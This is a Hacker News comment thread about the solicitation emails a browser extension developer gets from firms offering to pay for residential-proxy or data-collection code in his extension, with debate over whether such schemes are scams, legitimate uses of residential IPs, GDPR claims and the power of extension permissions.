[HN Gopher] Emails a browser extension developer gets from scammers
___________________________________________________________________
Emails a browser extension developer gets from scammers
Author : ajayyy
Score : 72 points
Date : 2021-01-23 17:37 UTC (5 hours ago)
(HTM) web link (sponsor.ajay.app)
(TXT) w3m dump (sponsor.ajay.app)
| rsync wrote:
| I believe this ecosystem is simply an extension of the prior
| systray ecosystem wherein small, sometimes free windows
| applications would bundle a "helper" app that would basically spy
| on, and advertise to, the end user.
|
| This resulted, among other things, in an almost universal
| degradation of performance and usability of Windows XP/Vista for
| ... our parents and grandparents, basically.
| agwa wrote:
| It's worse now because browser extensions auto-update which
| means that when a malicious actor buys an extension they gain
| access not only to future users but to all current users as
| well. Also, the Chrome Extension Store publicizes how many
| users each extension has, which allows malicious actors to
| operate extremely efficiently as they can easily find
| extensions to acquire and they know exactly what they're
| buying.
| sashagim wrote:
| And even worse, because they don't only hurt performance and
| usability, but they also report private information. Even is
| the data is sent anymously, the url itself may contain
| private information. For instance, Google themselves still
| allow sharing documents via a "private" link which is then
| stored on some monitoring service. And some of those services
| allow anyone access and search these urls for some premium
| plan.
| danieldbird wrote:
| "our parents and grandparents, basically."
|
| I now feel officially elderly, Cheers for that. Lol.
| Aerroon wrote:
| I think the implication here was that your parents and
| grandparents were less computer savvy at the time. This
| resulted in them installing all kinds of toolbars that
| destroyed performance.
| throwawayboise wrote:
| Not just small free apps. Oracle would install the Ask toolbar
| when you installed their database server, unless you noticed
| and un-ticked that option in one of the installer dialogs.
| _Oracle_.
| akiselev wrote:
| IIRC for a while the official Java runtime installer also
| installed the Ask toolbar.
| david422 wrote:
| I have a small website that can get a surprising amount of
| traffic. Every other day I get an email from some "SEO expert"
| wanting to redesign my site or offer some partnership so I get
| more traffic.
|
| Which is slightly amusing because I must be getting enough
| traffic for them to want to find me.
| Debug_Overload wrote:
| Almost every SEO "guru" and "expert" is a glorified snake oil
| salesman. I look at that whole industry the same way I look at
| the traditional woo-woo peddlers.
| dr_kiszonka wrote:
| That one email from Datos looking pretty professional. I don't
| know what their business is about, but they don't necessarily
| seem like scammers per se.
| kwerk wrote:
| Seems weird the first scammer asks the Dev to "unsubscribe" from
| their emails in the third message. Wouldn't that hurt their
| deliverability?
| blackbear_ wrote:
| It's a way to know that there's a real human behind the
| computer screen and that the address is not fake. Even a single
| bit of information can be valuable.
| drewmol wrote:
| >Wouldn't that hurt their deliverability?
|
| If you're referring to deliverability of emails in the context
| of email spam filters then no. Having an unsubscribe option on
| repeated, unanswered solicitations would be helpful. The emails
| are not spam, and in the first email chain they are rather
| straightforward about their proposal and methods. I'm not sure
| what the _scam_ actually is here.. people offering money for
| dev to _scam_ users out of bandwidth? I do think it 's noble of
| dev ignore the solicitation and provide exposure to this market
| however.
| bransonf wrote:
| It's pretty obvious what infatica is doing and while I agree it's
| shady, I wouldn't call it a scam.
|
| Peer-to-peer proxy doesn't mean a botnet, at least not how I
| think most people think that to mean. Rather they are routing
| traffic through residential IPs for a number of customers.
| $25-45/1000 users sounds exactly within the margins of a VPN
| provider (they even mention hola.org in the 3rd email, which is
| $2.99/m per 'premium' user or free if you become a node in the
| network) and residential proxies are also commonly used for
| scraping and other IP-sensitive work, again within those margins.
|
| I didn't find the code sample to be obfuscated, it was actually
| quite clear. It establishes a web socket with a server and simply
| passes requests through an endpoint, I.e. literally just a proxy.
|
| All that said, it's definitely shady to put this in your
| extension without users knowing. But, if you need to monetize
| something free, and make at least a good effort to inform users
| or allow them to opt out, and we trust infatica doesn't allow
| illegal use of its proxy network, then I don't really see the
| problem.
|
| There's a real need for residential IPs, no market to give each
| user $.025 and I can't really fault someone for making a business
| out of this.
|
| Edit: I also find irony that the author labels datos.live a
| "scammer" when in fact they are a very legitimate business
| engaged in similar data collection to what Google already does.
| ...The same author who published an extension (in the Chrome
| Store) for YouTube
| ajayyy wrote:
| About Datos, I'll reply and see if I can get more info about
| them. I still do not understand how it would be "gdpr
| friendly", as the data for sure would not be required for the
| service
| Nextgrid wrote:
| They call it GDPR-friendly because there is no serious
| enforcement of the GDPR and so they know they will fly under
| the (non-existent) radar.
|
| This is the same reason how websites claim to "comply" with
| the GDPR with a cookie consent prompt that only allows you to
| accept (and declining is hard/impossible).
| sashagim wrote:
| What you're saying is that they are not indeed GDPR-
| friendly? That would make their claim a false one.
| yuliyp wrote:
| What "legitimate" need is there for residential IPs? These are
| internet connections that are generally less reliable than
| commercial connections. The biggest usage for them is for
| fooling web sites into the nature of the traffic they are
| serving.
| tiagod wrote:
| Web scraping is perfectly legal in many jurisdictions, as
| well as getting around the countermeasures. A datacenter IP
| is a huge red flag for those.
| arpa wrote:
| Scraping (serp/e-commerce/other).
| bransonf wrote:
| That's pretty much exactly the point. On the consumer facing
| side there is the VPN market, which people use to access
| content in remote locations or obfuscate their traffic to
| prevent surveillance/fingerprinting.
|
| On the business side, there's a real need to be able to
| scrape say LinkedIn or Amazon, which necessitates rotating
| IPs to avoid getting blocked. The legal precedent currently
| incentivizes this sort of behavior between both parties.
|
| Mentioned also, however, is that criminals can use the
| technology to advance fraud.
| cbsks wrote:
| So instead of the scraper's IP being banned, it's mine?
| That's not good.
| sashagim wrote:
| I don't believe the users are made aware of this kind of usage
| of their network. In fact, I'm pretty confident that most
| extension burry this purposefully In such small letters it's
| impossible to understand. Which, for me, qualifies them as
| malware.
| walrus01 wrote:
| The further you dig into the "residential proxy" market, the
| more shady it gets.
|
| Google "residential proxies for sale" and follow the rabbit
| hole down...
| bransonf wrote:
| I certainly am not going to defend the whole market. I'm
| aware of many issues.
|
| But, there is a strict business need for these proxies. If
| you plan to fight giants, the first thing you need is their
| data. And you can't get it without proxies.
|
| Sure, that's another subject for debate; whether
| scraping/crawling is ethical itself.
| walrus01 wrote:
| Unfortunately it's not just scraping, they're also often
| used for outright fraud. Various online payment payment
| processors' fraud detection systems can be circumvented
| partially by appearing as a legit residential end user on a
| comcast cable connection, for instance. Or lots of other
| fraudulent activities where you have a click worker in a
| cube farm in a low labor cost location, using the proxy,
| pretending to be an end user in the usa.
| butz wrote:
| Time to add user privacy and data usage dialogs to web extensions
| to inform users about "monetized" extensions, especially those
| trying to sneak in such SDKs later.
| ajayyy wrote:
| Chrome webstore has actually started experimenting with an
| AppStore style privacy page (seems to be A/B test for now)
|
| https://media.discordapp.net/attachments/609441389423493128/...
| avipars wrote:
| Great extension, and as an app developer and very small
| influencer (several thousand followers), I still get spam and
| personalized phishing...
|
| 90% are just bots and automated attacks
| avipars wrote:
| Scraping instagram, YT, and especially my Youtube account for
| information
| throwaway13337 wrote:
| Browser extensions are the most vulnerable every day apps people
| use.
|
| They're given so much power so quickly. Users agree to 'view and
| modify website data' not realizing that the app can now run
| arbitrary code on their gmail/banking/whatever accounts to report
| all information including passwords. For all the concern over
| application security, little is talked about here.
|
| Browser extensions are also super important. They stand as the
| only tool for users to take back control over their experience
| from companies that are in the interest of manipulating them for
| profit whenever they can. They are uniquely our agents here.
|
| Still, each extension is a potential huge vulnerability. It's
| tough to find a balance here.
| rakoo wrote:
| Browser extensions have exactly as much power as the browser
| itself; that's why browser vendors controlling the distribution
| of extensions is not a bad idea in itself. Maybe there's a
| greater discussion to be had about the power that browsers
| themselves have over what has now become the life of their
| users.
| evilpie wrote:
| > Browser extensions have exactly as much power as the
| browser itself
|
| I would say this is false. Browsers can run arbitrary code on
| your machine. Extensions can't even access local files. If we
| are just talking about site information like cookies I would
| agree.
| edoceo wrote:
| Local File Browser extension for Chrome
|
| https://chrome.google.com/webstore/detail/local-explorer-
| fil...
| evilpie wrote:
| Okay, but that requires installing a native code module.
| eldog_ wrote:
| Have an extension on the chrome store too and receive these
| emails regularly. Promising cash to turn your extension into
| malware. Mine is a small, specific project that took a weekend or
| so of work, so I'm sure others in the same position would be
| tempted to take them up.
| mackrevinack wrote:
| one of the things that is keeping me on firefox is how many open
| source extensions there are. i use maybe 16 and they are all open
| source, which doesn't mean they're free of malware, but it
| definitely reduces the likelihood
| tomaszs wrote:
| How do he know these emails are from scammers? Some of these seem
| like legimate offers at the first glance. Please don't downvote
| if this is a stupid question for you. I'd really like to know how
| to recognize a scam email in these situations as a browser
| extension dev.
| mads wrote:
| I believe the "scammer" parts comes from them wanting to leech
| data off the users of the given extensions. They are upfront
| about their intentions, I think, so scammer is maybe not the
| appropriate term. "Scummer" maybe.
| tomaszs wrote:
| It seems like it is a series of emails from one sender. The
| first email is about sharing users IPs. What can such scammer
| do with user IP?
| drewmol wrote:
| They want to _leech_ bandwidth off the userbase which
| become 'bots', to resell as a distributed proxy/botnet
| service from my understanding at least.
| ajayyy wrote:
| I just added another email I got that I forgot about. In that
| one, they it looks like they steal the user's request headers.
| Their website also disappeared a month after their email.
| dzhiurgis wrote:
| Wonder if these "partners" can be efficiently milked of their
| programmes - setup millions of browser instances in cloud...
| chovybizzass wrote:
| sounds like the ones i get when i register a domain.
___________________________________________________________________
(page generated 2021-01-23 23:01 UTC)